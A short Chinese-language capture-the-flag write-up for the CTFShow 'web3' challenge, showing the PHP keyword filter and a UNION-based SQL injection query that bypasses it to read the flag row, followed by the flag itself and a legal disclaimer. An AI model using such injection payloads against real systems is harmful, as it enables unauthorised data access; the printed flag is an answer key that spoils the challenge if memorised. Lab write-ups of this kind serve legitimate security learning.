【CTF Web】CTFShow web3 Writeup(SQL注入+PHP+UNION注入)

web3

1

管理员被狠狠的教育了,所以决定好好修复一番。这次没问题了。


解法

注意到:

html 复制代码
<!-- flag in id = 1000 -->

但是拦截很多种字符。

php 复制代码
if(preg_match("/or|\-|\\|\*|\<|\>|\!|x|hex|\+/i",$id)){
        die("id error");
}

使用UNION注入:

sql 复制代码
?id=1 and 1=0 union select * from article where id=1000

取得 flag。

Flag

bash 复制代码
ctfshow{2dc7e880-3e21-4599-9c2b-c9b4a8009889}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的 。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为 ,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的 。对于因使用这些技术而导致的任何后果,博主不承担任何责任

相关推荐
数安3000天6 分钟前
增量数据如何自动分类分级,避免目录“过期“?
大数据·数据库
南墙上的石头1 小时前
麒麟 V10 重装人大金仓 V8R6 踩坑实录(含 MySQL 兼容模式)
数据库·mysql
大圣编程1 小时前
Python中continue语句的用法是什么?
开发语言·前端·python
upgrador2 小时前
基础知识:C++ STL构造函数的左闭右开惯例及其实现原理
开发语言·c++
画中有画2 小时前
论向量数据库在项目中的应用
数据库
spider_xcxc2 小时前
Redis 数据库高质量实践指南(一)
运维·数据库·redis·oracle·云计算
yoothey3 小时前
报废审批流规则引擎设计——责任链模式完整实现
linux·开发语言·bash
geovindu3 小时前
python: Functional Options Pattern
开发语言·后端·python·设计模式·惯用法模式·函数式选项模式
wuyk5553 小时前
24. C 语言模块化:不是拆几个.c 文件那么简单
c语言·开发语言·stm32·单片机
l1t3 小时前
在linux和windows中解决duckdb 1.6dev版本输出执行计划报错问题
linux·运维·数据库·windows·duckdb